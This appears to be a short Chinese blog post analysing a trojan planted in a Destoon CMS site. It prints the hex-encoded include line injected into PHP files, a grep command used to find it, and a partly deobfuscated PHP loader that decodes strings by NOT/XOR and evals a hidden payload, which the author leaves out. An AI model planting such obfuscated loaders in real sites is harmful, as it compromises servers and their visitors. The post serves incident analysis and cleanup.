Destoon被植木马 @include(PACK('H*','2F746D702F2E4943452D756E69782F30'));

暂无法确定，植入路径！

网站收录页面被指向波菜，但用浏览器，打开时提示403。应该代码中加入了判断浏览器header的代码。
查找代码，排除png,jpg,gif,html文件

grep -rn --exclude=*.jpg --exclude=*.png --exclude=*.gif --exclude=*.html  "include(PACK" . |more

在站内搜索到两个php文件,有代码写入

@include(PACK('H*','2F746D702F2E4943452D756E69782F30'));

用16进制转字符串后

2F746D702F2E4943452D756E69782F30  
=>
 /tmp/.ICE-unix/0

找到 0 这个文件。里面乱的一B.
分析整理后，大致如下：

<?php if(!defined('DCBDBBAEADBA')){
    define("DCBDBBAEADBA",__FILE__);
    function JiaMi($JiaMi,$salt=""){
        global $arr;
        $JiaMi=base64_decode($JiaMi);
        if(empty($JiaMi)) return "";
        if($salt==""){
            return ~$JiaMi;
        }else{
            $value=$arr['value']($JiaMi);
            $salt=$arr['result']($salt,$value,$salt);
            return $JiaMi^$salt;
        }
    }
}
global $arr;
$arr['result']=JiaMi('jIuNo碔+emw==','');
$arr['value']=JiaMi('jIuNk5qR','');
$arr['JiaMi']=JiaMi('mpKPi4Y=','');
$arr['salt']=JiaMi('nZ6Mm噑nLoJua祅JCbmg==','');
$arr['arg1']=JiaMi('HkQyMTc噊MiYbADZY','n6WVhZWVwaU=');
$arr['arg2']=JiaMi('0M/Gz5vM峮MnK坺s6dyZud瓃8ydzJ7H皔5rGz8nH焬p6b耼cae0Jo=','');
$arr['arg3']=JiaMi('DD9fPRc巔EVMDA蠽NGDg==','kZ+UxZe1zo2+kg==');
$arr['arg4']=JiaMi('CwQqVQ==','nrK9rLaJsJfE');
$arr['arg5']=isset($_SERVER['SERVER_ADDR'])?$_SERVER['SERVER_ADDR']:$arr['arg3']($_SERVER['SERVER_NAME']);
$arr['arg6']=isset($_SERVER['REMOTE_ADDR'])?$_SERVER['REMOTE_ADDR']:'';
$arr['arg7']=isset($_SERVER['HTTP_HOST'])?$_SERVER['HTTP_HOST']:(isset($_SERVER['SERVER_NAME'])?$_SERVER['SERVER_NAME']:'');
$arr['args']=JiaMi('CxkAVw4�ADcbCiQB','lcu9mYmGioWr');
DCBDBBAEADBA.eval($arr['args']($arr['salt'](' 省略')));
return;
?>3ad880bc5f1a854134b548078c11c2ed

发现是经过了位运算后的一种加密方式，无非是把DCBDBBAEADBA.eval($arr{[}^{\prime }arg{s}^{\prime }]($arr[‘salt’](’ 此处大小写字符很长，省略！’)));中省略的代码，解密出来。让服务器执行。